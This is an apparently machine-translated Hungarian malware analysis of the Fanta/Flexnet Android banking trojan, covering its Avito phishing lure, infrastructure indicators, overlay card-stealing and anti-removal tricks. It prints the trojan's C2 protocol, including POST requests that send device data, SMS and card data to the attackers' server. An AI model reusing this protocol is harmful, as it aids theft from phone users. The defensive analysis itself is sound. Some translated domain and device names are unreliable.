Egy napon szeretne eladni valamit az Avito-n, és miután közzétette termékének részletes leírását (például egy RAM modult), ezt az üzenetet fogja kapni:
A link megnyitása után megjelenik egy ártalmatlannak tűnő oldal, amely értesíti Önt, a boldog és sikeres eladót, hogy megtörtént a vásárlás:
Miután rákattintott a „Folytatás” gombra, a rendszer letölt egy APK-fájlt egy ikonnal és egy bizalomgerjesztő névvel Android-eszközére. Telepítettél egy alkalmazást, ami valamiért AccessibilityService jogokat kért, aztán megjelent pár ablak és gyorsan eltűntek és... Ennyi.
Megnézed az egyenlegedet, de valamiért a banki alkalmazás újra kéri a kártyaadataidat. Az adatok megadása után valami szörnyűség történik: valamilyen okból, ami még mindig nem világos, a pénz elkezd eltűnni a számlájáról. Megpróbálja megoldani a problémát, de telefonja ellenáll: megnyomja a „Vissza” és a „Kezdőlap” gombokat, nem kapcsol ki, és nem teszi lehetővé semmilyen biztonsági intézkedés aktiválását. Ennek eredményeként pénz nélkül marad, az áruit nem vásárolta meg, össze van zavarodva és csodálkozik: mi történt?
A válasz egyszerű: Ön az Android Trojan Fanta áldozata lett, a Flexnet család tagja. Hogy történt ez? Most magyarázzuk el.
Szerzők: Andrej Polovinkin, a rosszindulatú programok elemzésének junior szakértője, Ivan Pisarev, a rosszindulatú programok elemzésének szakértője.
Néhány statisztika
A Flexnet Android trójai család először 2015-ben vált ismertté. Meglehetősen hosszú tevékenységi idő alatt a család több alfajra bővült: Fanta, Limebot, Lipton stb. A trójai, valamint a hozzá kapcsolódó infrastruktúra nem áll meg: új, hatékony terjesztési sémák készülnek - esetünkben egy adott felhasználó-eladót célzó, jó minőségű adathalász oldalak, a trójai fejlesztők pedig a divatos trendeket követik vírusírás – olyan új funkciók hozzáadásával, amelyek lehetővé teszik a pénz hatékonyabb ellopását a fertőzött eszközökről és a védelmi mechanizmusok megkerülését.
A cikkben ismertetett kampány az oroszországi felhasználókat célozza meg, Ukrajnában kis számú fertőzött eszközt regisztráltak, Kazahsztánban és Fehéroroszországban pedig még kevesebbet.
Annak ellenére, hogy a Flexnet már több mint 4 éve az Android trójai arénája, és sok kutató részletesen tanulmányozta, még mindig jó állapotban van. 2019 januárjától a lehetséges kár több mint 35 millió rubel – és ez csak az oroszországi kampányokra vonatkozik. 2015-ben ennek az Android trójainak a különböző verzióit árulták földalatti fórumokon, ahol a trójai forráskódja is megtalálható volt részletes leírással. Ez azt jelenti, hogy a világ kárainak statisztikái még lenyűgözőbbek. Nem rossz mutató egy ilyen idős embernek, nem?
Az eladástól a megtévesztésig
Amint az a korábban bemutatott képernyőképen látható, amely az Avito internetes hirdetésmegjelenítési szolgáltatás adathalász oldaláról készült, egy konkrét áldozat számára készült. Nyilvánvalóan a támadók az Avito egyik értelmezőjét használják, amely kivonja az eladó telefonszámát és nevét, valamint a termékleírást. Az oldal kibővítése és az APK fájl elkészítése után az áldozatnak SMS-t küldenek a nevével és egy adathalász oldalra mutató hivatkozással, amely tartalmazza termékének leírását és a termék „eladásából” kapott összeget. A gombra kattintva a felhasználó egy rosszindulatú APK fájlt kap - Fanta.
A shcet491[.]ru domain tanulmányozása kimutatta, hogy az a Hostinger DNS-kiszolgálóira van delegálva:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
A tartományzónafájl a 31.220.23[.]236, 31.220.23[.]243 és 31.220.23[.]235 IP-címekre mutató bejegyzéseket tartalmaz. A tartomány elsődleges erőforrásrekordja (A rekord) azonban egy 178.132.1[.]240 IP-című szerverre mutat.
A 178.132.1[.]240 IP-cím Hollandiában található, és a tárhelyhez tartozik WorldStream. A 31.220.23[.]235, 31.220.23[.]236 és 31.220.23[.]243 IP-címek az Egyesült Királyságban találhatók, és a HOSTINGER megosztott tárhelyszerverhez tartoznak. Felvevőként használt openprov-ru. A következő tartományok szintén a 178.132.1[.]240 IP-címre lettek feloldva:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Megjegyzendő, hogy a következő formátumú hivatkozások szinte minden domainről elérhetők voltak:
http://(www.){0,1}<%domain%>/[0-9]{7}
Ez a sablon egy SMS-üzenetből származó hivatkozást is tartalmaz. A múltbeli adatok alapján kiderült, hogy egy domain több hivatkozásnak felel meg a fent leírt mintában, ami azt jelzi, hogy egy domaint használtak a trójai terjesztésére több áldozatnak.
Ugorjunk egy kicsit előre: az SMS-ből linken keresztül letöltött trójai a címet használja vezérlőszerverként onusedseddohap[.]klub. Ezt a domaint 2019-03-12-én regisztrálták, és 2019-04-29-től kezdődően az APK-alkalmazások interakcióba léptek ezzel a domainnel. A VirusTotaltól kapott adatok alapján összesen 109 alkalmazás lépett kapcsolatba ezzel a szerverrel. Maga a domain feloldotta az IP-címet 217.23.14[.]27, Hollandiában található és a házigazda tulajdonában van WorldStream. Felvevőként használt Namecheap. A domainek is erre az IP-címre lettek feloldva rossz-mosómedve[.]klub (2018-09-25-től) és bad-racoon[.]élő (2018-10-25-től). Domainnel rossz-mosómedve[.]klub több mint 80 APK fájl interakcióba került bad-racoon[.]élő - több mint 100.
Általában a támadás a következőképpen halad:
Mi van Fanta fedele alatt?
Sok más Android-trójaihoz hasonlóan a Fanta is képes SMS-ek olvasására és küldésére, USSD-kérésekre, valamint saját ablakainak megjelenítésére az alkalmazások (beleértve a bankiakat is) tetején. Megérkezett azonban ennek a családnak a funkcionalitás arzenálja: a Fanta elkezdte használni AccessibilityService különféle célokra: más alkalmazások értesítéseinek beolvasása, trójai program észlelésének megakadályozása és leállítása fertőzött eszközön stb. A Fanta az Android összes, 4.4-nél nem fiatalabb verzióján működik. Ebben a cikkben közelebbről megvizsgáljuk a következő Fanta-mintát:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Közvetlenül az indítás után
Közvetlenül az indítás után a trójai elrejti ikonját. Az alkalmazás csak akkor tud működni, ha a fertőzött eszköz neve nem szerepel a listában:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (borotva)
Ezt az ellenőrzést a trójai fő szolgáltatásában hajtják végre - Főszolgáltatás. Az első indításkor az alkalmazás konfigurációs paraméterei az alapértelmezett értékekre inicializálódnak (a konfigurációs adatok tárolásának formátumáról és jelentésükről később lesz szó), és egy új fertőzött eszközt regisztrálnak a vezérlőszerveren. Az üzenettípussal rendelkező HTTP POST kérés elküldésre kerül a szervernek register_bot valamint a fertőzött eszközzel kapcsolatos információk (Android verzió, IMEI, telefonszám, szolgáltató neve és országkódja, amelyben a szolgáltató regisztrálva van). A cím vezérlőszerverként szolgál hXXp://onuseseddohap[.]club/controller.php. Válaszul a szerver üzenetet küld, amely tartalmazza a mezőket bot_id, bot_pwd, szerver — az alkalmazás ezeket az értékeket a CnC szerver paramétereiként menti. Paraméter szerver opcionális, ha a mező nem érkezett meg: Fanta a regisztrációs címet használja - hXXp://onuseseddohap[.]club/controller.php. A CnC cím megváltoztatásának funkciója két probléma megoldására használható: a terhelés egyenletes elosztása több szerver között (ha sok a fertőzött eszköz, nagy lehet a terhelés egy nem optimalizált webszerveren), valamint alternatív szerver az egyik CnC szerver meghibásodása esetén.
Ha a kérés elküldése közben hiba történik, a trójai 20 másodperc múlva megismétli a regisztrációs folyamatot.
Az eszköz sikeres regisztrációja után a Fanta a következő üzenetet jeleníti meg a felhasználónak:
Fontos megjegyzés: a szerviz hívott Rendszerbiztonság — a trójai szolgáltatás nevét, majd a gombra kattintás után ОК Megnyílik egy ablak a fertőzött eszköz Kisegítő lehetőségek beállításaival, ahol a felhasználónak hozzáférési jogokat kell adnia a rosszindulatú szolgáltatáshoz:
Amint a felhasználó bekapcsol AccessibilityService, a Fanta hozzáfér az alkalmazásablakok tartalmához és az azokban végrehajtott műveletekhez:
Közvetlenül a kisegítő lehetőségek megszerzése után a trójai rendszergazdai jogokat és értesítések olvasásához szükséges jogokat kér:
Az AccessibilityService használatával az alkalmazás szimulálja a billentyűleütéseket, ezáltal megadja magának az összes szükséges jogot.
A Fanta több adatbázispéldányt hoz létre (amelyeket később ismertetünk), amelyek szükségesek a konfigurációs adatok, valamint a folyamat során a fertőzött eszközről gyűjtött információk tárolásához. Az összegyűjtött információk elküldéséhez a trójai ismétlődő feladatot hoz létre, amelynek célja a mezők letöltése az adatbázisból, és parancs fogadása a vezérlőkiszolgálótól. A CnC elérésének időköze az Android verziótól függően van beállítva: 5.1 esetén az intervallum 10 másodperc, egyébként 60 másodperc.
A parancs fogadásához Fanta kérést tesz GetTask a felügyeleti szerverre. Válaszul a CnC a következő parancsok egyikét küldheti el:
| Csapat | Leírás |
|---|---|
| 0 | SMS üzenet küldése |
| 1 | Indítson telefonhívást vagy USSD-parancsot |
| 2 | Frissít egy paramétert intervallum |
| 3 | Frissít egy paramétert feltartóztat |
| 6 | Frissít egy paramétert smsManager |
| 9 | Kezdje el az SMS-ek gyűjtését |
| 11 | Állítsa vissza a telefont a gyári beállításokra |
| 12 | A párbeszédpanel létrehozásának naplózásának engedélyezése/letiltása |
A Fanta emellett 70 banki alkalmazás, gyorsfizetési rendszer és e-pénztárca értesítéseit is összegyűjti és adatbázisban tárolja.
Konfigurációs paraméterek tárolása
A konfigurációs paraméterek tárolására a Fanta az Android platformon szokásos megközelítést alkalmaz - preferenciák- fájlok. A beállítások egy nevű fájlba kerülnek mentésre beállítások. A mentett paraméterek leírása az alábbi táblázatban található.
| név | Alapértelmezett érték | Lehetséges értékek | Leírás |
|---|---|---|---|
| id | 0 | Egész szám | Bot azonosító |
| szerver | hXXp://onuseseddohap[.]club/ | URL | Szerver címének szabályozása |
| pwd | - | Húr | Szerver jelszó |
| intervallum | 20 | Egész szám | Időintervallum. Azt jelzi, hogy mennyi ideig kell elhalasztani a következő feladatokat:
|
| feltartóztat | minden | mind/telNumber | Ha a mező egyenlő a karakterlánccal minden vagy telNumber, akkor a fogadott SMS-t az alkalmazás elfogja, és nem jeleníti meg a felhasználó számára |
| smsManager | 0 | 0/1 | Az alkalmazás engedélyezése/letiltása alapértelmezett SMS-címzettként |
| read Dialog | hamis | Igaz hamis | Eseménynaplózás engedélyezése/letiltása AccessibilityEvent |
Fanta is használja a fájlt smsManager:
| név | Alapértelmezett érték | Lehetséges értékek | Leírás |
|---|---|---|---|
| pckg | - | Húr | A használt SMS-üzenetkezelő neve |
Adatbázisokkal való interakció
Működése során a trójai két adatbázist használ. Az adatbázis neve a a telefonról gyűjtött különféle információk tárolására szolgál. A második adatbázis neve fanta.db és a bankkártyákkal kapcsolatos információk gyűjtésére szolgáló adathalász ablakok létrehozásáért felelős beállítások mentésére szolgál.
Trójai adatbázist használ а az összegyűjtött információk tárolására és a műveletek naplózására. Az adatok egy táblázatban tárolódnak naplók. Táblázat létrehozásához használja a következő SQL lekérdezést:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Az adatbázis a következő információkat tartalmazza:
1. A fertőzött eszköz indításának naplózása üzenettel A telefon bekapcsolt!
2. Alkalmazások értesítései. Az üzenet a következő sablon szerint jön létre:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkártya adatok a trójai által létrehozott adathalász űrlapokról. Paraméter VIEW_NAME a következők egyike lehet:
- Vatera piacterén
- Avito
- A Google Play
- Egyéb <%App Name%>
Az üzenet a következő formátumban kerül naplózásra:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Bejövő/kimenő SMS üzenetek a következő formátumban:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Információ a párbeszédpanelt létrehozó csomagról a következő formátumban:
(<%Package name%>)<%Package information%>
Példa táblázat naplók:
A Fanta egyik funkciója a bankkártyákkal kapcsolatos információgyűjtés. Az adatgyűjtés az adathalász ablakok létrehozásával történik a banki alkalmazások megnyitásakor. A trójai csak egyszer hozza létre az adathalász ablakot. Táblázatban tárolják az ablakot a felhasználónak megjelenített információkat beállítások az adatbázisban fanta.db. Adatbázis létrehozásához használja a következő SQL lekérdezést:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Minden táblázat mező beállítások alapértelmezés szerint 1-re inicializálva (adathalászati ablak létrehozása). Miután a felhasználó megadta adatait, az érték 0 lesz. Példa táblázat mezőire beállítások:
- can_login — a mező felelős az űrlap megjelenítéséért banki alkalmazás megnyitásakor
- first_bank - nem használt
- can_avito — a mező felelős az űrlap megjelenítéséért az Avito alkalmazás megnyitásakor
- can_ali — a mező felelős az űrlap megjelenítéséért az Aliexpress alkalmazás megnyitásakor
- tud_másik — a mező felelős az űrlap megjelenítéséért, amikor a listáról bármelyik alkalmazást megnyitják: Yula, Pandao, Drom Auto, Wallet. Kedvezmény- és bónuszkártyák, Aviasales, Foglalás, Trivago
- can_card — a mező felelős az űrlap megnyitáskor történő megjelenítéséért A Google Play
Interakció a felügyeleti szerverrel
A hálózati interakció a felügyeleti szerverrel a HTTP protokollon keresztül történik. A hálózattal való együttműködéshez a Fanta a népszerű Retrofit könyvtárat használja. A kérelmeket a következő címre küldjük: hXXp://onuseseddohap[.]club/controller.php. A szerver címe a szerveren való regisztráció során módosítható. Cookie-kat küldhet válaszként a szerver. Fanta a következő kéréseket küldi a szervernek:
- A bot regisztrációja a vezérlőszerveren egyszer megtörténik, az első indításkor. A fertőzött eszközről a következő adatok kerülnek elküldésre a szervernek:
· aprósütemény — a szervertől kapott cookie-k (az alapértelmezett érték egy üres karakterlánc)
· üzemmód — string állandó register_bot
· prefix — egész állandó 2
· version_sdk — a következő sablon szerint van kialakítva: <%Build.MODEL%>/<%Build.VERSION.RELEASE%> (Avit)
· IMEI — A fertőzött eszköz IMEI-je
· ország — annak az országnak a kódja, amelyben az üzemeltetőt bejegyezték, ISO formátumban
· szám - telefonszám
· operátor — operátor nevePélda a szervernek küldött kérésre:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>A kérésre válaszul a szervernek egy JSON objektumot kell visszaadnia, amely a következő paramétereket tartalmazza:
· bot_id — A fertőzött eszköz azonosítója. Ha a bot_id értéke 0, a Fanta újra végrehajtja a kérést.
bot_pwd — jelszó a szerverhez.
szerver — a szerver címének ellenőrzése. Opcionális paraméter. Ha a paraméter nincs megadva, akkor az alkalmazásban elmentett cím kerül felhasználásra.Példa JSON objektumra:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Parancs fogadásának kérése a szervertől. A következő adatok kerülnek a szerverre:
· aprósütemény — a szervertől kapott cookie-k
· kínálat — a fertőzött eszköz azonosítója, amely a kérelem elküldésekor érkezett register_bot
· pwd -jelszó a szerverhez
· dive_admin — a mező határozza meg, hogy megszerezték-e a rendszergazdai jogosultságokat. Ha rendszergazdai jogosultságokat szerzett, a mező egyenlő: 1, másképp 0
· megközelíthetőség — Az akadálymentesítési szolgáltatás működési állapota. Ha a szolgáltatás elindult, az érték a következő 1, másképp 0
· SMSManager — megmutatja, hogy a trójai engedélyezve van-e alapértelmezett alkalmazásként az SMS fogadására
· képernyő — megmutatja, milyen állapotban van a képernyő. Az érték be lesz állítva 1, ha a képernyő be van kapcsolva, ellenkező esetben 0;Példa a szervernek küldött kérésre:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>A parancstól függően a szerver különböző paraméterekkel adhat vissza JSON-objektumot:
· Csapat SMS üzenet küldése: A paraméterek tartalmazzák a telefonszámot, az SMS üzenet szövegét és a küldendő üzenet azonosítóját. Az azonosító akkor használatos, amikor üzenetet küld a szervernek típussal setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Csapat Indítson telefonhívást vagy USSD-parancsot: A telefonszám vagy parancs a választörzsben található.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Csapat Időköz paraméter módosítása.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Csapat Változtassa meg az elfogási paramétert.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Csapat Módosítsa az SmsManager mezőt.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Csapat SMS üzenetek gyűjtése egy fertőzött eszközről.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Csapat Állítsa vissza a telefont a gyári beállításokra:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Csapat Módosítsa a ReadDialog paramétert.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Üzenet küldése típussal setSmsStatus. Ez a kérés a parancs végrehajtása után történik SMS üzenet küldése. A kérés így néz ki:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Adatbázis tartalmának feltöltése. Kérelemenként egy sor kerül továbbításra. A következő adatok kerülnek a szerverre:
· aprósütemény — a szervertől kapott cookie-k
· üzemmód — string állandó setSaveInboxSms
· kínálat — a fertőzött eszköz azonosítója, amely a kérelem elküldésekor érkezett register_bot
· szöveg — szöveg az aktuális adatbázis rekordban (mező d az asztaltól naplók az adatbázisban а)
· szám — az aktuális adatbázisrekord neve (mező p az asztaltól naplók az adatbázisban а)
· sms_mode — egész érték (mező m az asztaltól naplók az adatbázisban а)A kérés így néz ki:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Sikeres elküldés esetén a sor törlődik a táblából. Példa a szerver által visszaadott JSON objektumra:
{ "response":[], "status":"ok" }
Interakció az AccessibilityService szolgáltatással
Az AccessibilityService azért került bevezetésre, hogy az Android-eszközök könnyebben használhatók legyenek a fogyatékkal élők számára. A legtöbb esetben fizikai interakció szükséges az alkalmazással való interakcióhoz. Az AccessibilityService lehetővé teszi, hogy ezeket programozottan végezze el. A Fanta a szolgáltatás segítségével hamis ablakokat hoz létre a banki alkalmazásokban, és megakadályozza, hogy a felhasználók megnyissák a rendszerbeállításokat és egyes alkalmazásokat.
Az AccessibilityService funkcióit használva a trójai figyeli a fertőzött eszköz képernyőjén megjelenő elemek változásait. Amint azt korábban leírtuk, a Fanta beállításai tartalmaznak egy paramétert, amely a párbeszédpanelekkel végzett naplózási műveletekért felelős - read Dialog. Ha ez a paraméter be van állítva, az eseményt kiváltó csomag nevével és leírásával kapcsolatos információk hozzáadódnak az adatbázishoz. A trójai események indításakor a következő műveleteket hajtja végre:
- A következő esetekben szimulálja a vissza és a kezdőgomb megnyomását:
· ha a felhasználó újra akarja indítani a készülékét
· ha a felhasználó törölni szeretné az „Avito” alkalmazást vagy módosítani szeretné a hozzáférési jogokat
· ha az oldalon szerepel az „Avito” alkalmazás
· a Google Play Protect alkalmazás megnyitásakor
· amikor oldalakat nyit meg az AccessibilityService beállításaival
· amikor megjelenik a Rendszerbiztonság párbeszédpanel
· amikor megnyitja az oldalt a „Draw over other app” beállításokkal
· az „Alkalmazások” oldal megnyitásakor a „Helyreállítás és visszaállítás”, „Adatok visszaállítása”, „Beállítások visszaállítása”, „Fejlesztői panel”, „Speciális. lehetőségek”, „Különleges lehetőségek”, „Különleges jogok”
· ha az eseményt bizonyos alkalmazások generálták.Alkalmazások listája
- android
- Master Lite
- Tiszta mester
- Clean Master x86 CPU-hoz
- Meizu Alkalmazásengedély-kezelés
- MIUI biztonság
- Clean Master – vírusirtó, gyorsítótár és szeméttisztító
- Szülői felügyelet és GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock és Web Security Beta
- Vírustisztító, víruskereső, tisztító (MAX Security)
- Mobile AntiVirus Security PRO
- Avast víruskereső és ingyenes védelem 2019
- Mobilbiztonság MegaFon
- AVG védelem Xperiához
- Mobil biztonság
- Malwarebytes víruskereső és védelem
- Víruskereső Android 2019-hez
- Biztonsági mester - Víruskereső, VPN, AppLock, Booster
- AVG víruskereső a Huawei tablet rendszerkezelőhöz
- Samsung kisegítő lehetőségek
- Samsung Smart Manager
- Biztonsági Mester
- Gyorsító
- dr.web
- Dr.Web biztonsági tér
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Víruskereső és mobil biztonság
- Kaspersky Internet Security: Víruskereső és védelem
- Kaspersky akkumulátor-élettartam: Saver & Booster
- Kaspersky Endpoint Security – védelem és kezelés
- AVG Antivirus ingyenes 2019 – védelem Androidra
- Android antivírus
- Norton Mobile Security and Antivirus
- Vírusirtó, tűzfal, VPN, mobilbiztonság
- Mobilbiztonság: vírusirtó, VPN, lopásvédelem
- Víruskereső Androidra
- Ha engedélyt kérnek SMS üzenet rövid számra küldésekor, a Fanta szimulálja a jelölőnégyzetre kattintást Emlékezzen a választásra és gombot a send.
- Amikor megpróbálja elvenni a rendszergazdai jogokat a trójai programtól, az lezárja a telefon képernyőjét.
- Megakadályozza az új rendszergazdák hozzáadását.
- Ha a víruskereső alkalmazás dr.web fenyegetést észlelt, Fanta a gomb megnyomását imitálja figyelmen kívül hagyni.
- A trójai szimulálja a vissza és a kezdőlap gomb megnyomását, ha az eseményt az alkalmazás generálta Samsung Device Care.
- A Fanta adathalász ablakokat hoz létre űrlapokkal a bankkártyák adatainak megadására, ha egy olyan listáról indult el egy alkalmazás, amely körülbelül 30 különböző internetes szolgáltatást tartalmaz. Köztük: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto stb.
Adathalász űrlapok
A Fanta elemzi, hogy mely alkalmazások futnak a fertőzött eszközön. Ha egy érdeklődésre számot tartó alkalmazást megnyitott, a trójai egy adathalász ablakot jelenít meg az összes többi mellett, amely egy űrlap a bankkártya adatok megadására. A felhasználónak a következő adatokat kell megadnia:
- Kártyaszám
- Kártya Lejárati Dátuma
- CVV
- A kártyabirtokos neve (nem minden banknál)
A futó alkalmazástól függően különböző adathalász ablakok jelennek meg. Az alábbiakban ezekre mutatunk be példákat:
AliExpress:
Avito:
Néhány más alkalmazáshoz, pl. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Hogy volt valójában
Szerencsére a cikk elején leírt SMS-t kapó személyről kiderült, hogy kiberbiztonsági szakember. Ezért a valódi, nem rendezői verzió eltér a korábban elmondottaktól: egy személy kapott egy érdekes SMS-t, ami után átadta az IB-csoport fenyegetésvadász hírszerzési csapatának. A támadás eredménye ez a cikk. Happy end, ugye? Azonban nem minden történet végződik ilyen sikeresen, és hogy a tiéd ne tűnjön pénzkieséssel járó rendezői vágásnak, a legtöbb esetben elég betartani a következő, régóta leírt szabályokat:
- ne telepítsen alkalmazásokat Android operációs rendszert futtató mobileszközre a Google Playen kívül más forrásból
- Egy alkalmazás telepítésekor fordítson különös figyelmet az alkalmazás által kért jogokra
- ügyeljen a letöltött fájlok kiterjesztésére
- rendszeresen telepítse az Android operációs rendszer frissítéseit
- ne keresse fel a gyanús forrásokat, és ne töltsön le onnan fájlokat
- Ne kattintson az SMS-ben kapott hivatkozásokra.
Forrás: will.com